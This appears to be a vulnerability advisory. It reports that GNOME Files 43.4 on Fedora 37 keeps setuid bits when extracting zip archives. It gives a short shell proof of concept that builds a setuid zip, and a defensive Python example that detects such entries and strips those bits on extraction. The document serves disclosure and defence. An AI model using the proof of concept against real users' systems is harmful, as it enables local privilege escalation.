GNOME Files 43.4 Privilege Escalation
GNOME Files version 43.4 (nautilus) on Fedora 37 extracts zip archives containing setuid files with the setuid bit intact, which another local user can leverage to escalate privileges.
Affected: GNOME Files 43.4 (nautilus) on Fedora 37

Description:

If a user A opens, in GNOME Files, a zip archive containing a `setuid` file F, then F is silently extracted to a subdirectory of the CWD with its setuid bit intact. If F is accessible to a hostile local user B and B executes F, then F runs as user A.

tar(1) and unzip(1) are not vulnerable to this attack.

Session for creating the ZIP. After that, just open f.zip in GNOME Files.

<pre>
[joro@fedora ~]$ umask
0022
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Archive: f.zip
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/
[joro@fedora 2]$
</pre>
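As an added illustration (not part of the advisory), the Python below shows where the setuid/setgid bits travel in a zip entry (the high 16 bits of the external attributes), how an extractor can flag such entries before writing anything, and how to extract while applying only the plain rwx bits. The sample archive is constructed inline to mirror the advisory's F (mode -rwsr-sr-x); function names are this example's own.

```python
import io
import os
import stat
import tempfile
import zipfile

def unix_mode(info: zipfile.ZipInfo) -> int:
    """Unix-created entries keep st_mode in the high 16 bits of external_attr."""
    return (info.external_attr >> 16) & 0xFFFF

def find_suid_entries(data: bytes) -> list:
    """Return (name, mode) for every entry carrying the setuid or setgid bit."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(i.filename, unix_mode(i)) for i in zf.infolist()
                if unix_mode(i) & (stat.S_ISUID | stat.S_ISGID)]

def safe_extract(data: bytes, dest: str) -> list:
    """Extract into dest applying only rwx bits; returns the mode set per entry."""
    root = os.path.realpath(dest)
    applied = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(root, info.filename))
            if not target.startswith(root + os.sep):  # also refuses ../ escapes
                raise ValueError(f"entry escapes destination: {info.filename}")
            zf.extract(info, root)  # zipfile never applies mode bits by itself
            mode = unix_mode(info) & 0o777  # drops 04000 (suid), 02000 (sgid), 01000
            if mode:
                os.chmod(target, mode)
            applied.append(mode)
    return applied

def build_sample_zip(mode: int = 0o106755) -> bytes:
    """Constructed sample: one file F; default mode is S_IFREG|suid|sgid|0755."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("F")
        info.external_attr = mode << 16  # st_mode goes in the high 16 bits
        zf.writestr(info, "hi\n")
    return buf.getvalue()

def demo() -> dict:
    """Round trip on the sample: flag it, extract safely, read back on-disk mode."""
    data = build_sample_zip()
    with tempfile.TemporaryDirectory() as dest:
        applied = safe_extract(data, dest)
        on_disk = stat.S_IMODE(os.stat(os.path.join(dest, "F")).st_mode)
    return {"flagged": find_suid_entries(data), "applied": applied, "on_disk": on_disk}
```

demo() returns the flagged entries together with the modes applied during extraction and the mode actually found on disk, so a reader can confirm the setuid and setgid bits never reach the filesystem.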